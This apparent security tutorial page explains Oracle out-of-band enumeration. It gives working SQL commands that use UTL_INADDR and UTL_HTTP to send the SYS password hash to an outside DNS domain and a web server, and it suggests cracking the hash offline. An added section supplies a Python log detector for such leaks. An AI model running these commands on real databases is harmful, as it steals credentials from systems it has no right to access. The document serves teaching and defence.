DNS/HTTP Enumeration
Oracle has a couple of stored procedures that can be manipulated to
enumerate sensitive application system information. You are basically
using Oracle's built-in web services against itself. This was
demonstrated at the Blackhat Breaking into
Oracle Server class given by David Litchfield of NGS Software. The
procedures in question are:
By abusing normal DNS and HTTP requests from a normal SQL prompt, it may be
possible to gain password hashes etc.:
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
*
ERROR at line 1:
ORA-29257: host D3AAEDA7EDA1B4AA.vulnerabilityassessment.co.uk unknown
ORA-06512: at "SYS.UTL_INADDR", line 19
ORA-06512: at "SYS.UTL_INADDR", line 40
ORA-06512: at line 1
and
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
UTL_HTTP.REQUEST('HTTP://GLADIUS:5500/'||(SELECTPASSWORDFROMDBA_USERSWHEREUSERNA
--------------------------------------------------------------------------------
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>Resource /D3AAEDA7EDA1B4AA not found on this server</BODY></HTML>
In both examples above the SYS password hash is very nicely provided to us,
and it can then be cracked offline with tools such as Cain etc.
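From the defending side, both channels leave the same trace: a 16-hex-character token appearing as a DNS label or as a URL path segment in traffic that originates from the database host. The following is an added example, not part of the original page, that flags such tokens in log lines; the log format and the sample lines are constructed for illustration, and a hit is a lead to investigate, since 16-hex-character names can also be legitimate.

```python
import re

# The hash in the session above (D3AAEDA7EDA1B4AA) is 16 hex characters.
HASH = r"[0-9A-Fa-f]{16}"
# UTL_INADDR case: the hash is a whole leftmost DNS label under some domain.
DNS_RE = re.compile(rf"(?<![\w.-])({HASH})\.((?:[\w-]+\.)+[A-Za-z]{{2,}})")
# UTL_HTTP case: the hash is a whole path segment of a requested URL.
HTTP_RE = re.compile(rf"\b(?:GET|POST|HEAD) \S*/({HASH})(?=[/? ]|$)")

def find_hash_leaks(lines):
    """Return (line_no, channel, token) for every line carrying a
    hash-shaped token in a DNS name or an HTTP request path."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = HTTP_RE.search(line)
        if m:
            hits.append((no, "http", m.group(1).upper()))
            continue
        m = DNS_RE.search(line)
        if m:
            hits.append((no, "dns", m.group(1).upper()))
    return hits

# Constructed sample: resolver and proxy log lines for a database host
# (10.0.0.5) and an ordinary client (10.0.0.9). Format is hypothetical.
SAMPLE = [
    "2024-01-01T10:00:01 10.0.0.5 query A www.example.com",
    "2024-01-01T10:00:02 10.0.0.5 query A "
    "D3AAEDA7EDA1B4AA.vulnerabilityassessment.co.uk",
    "2024-01-01T10:00:03 10.0.0.5 GET http://gladius:5500/D3AAEDA7EDA1B4AA 404",
    "2024-01-01T10:00:04 10.0.0.9 GET /static/app.js 200",
    # 20-character label: contains hex runs but is not a bare 16-hex label.
    "2024-01-01T10:00:05 10.0.0.9 query A cdn0123456789abcdef0.example.net",
]

if __name__ == "__main__":
    for no, channel, token in find_hash_leaks(SAMPLE):
        print(f"line {no}: {channel} request carries hash-shaped token {token}")
```

Outbound name lookups or HTTP requests from a database server are themselves worth alerting on, whatever the requested name looks like.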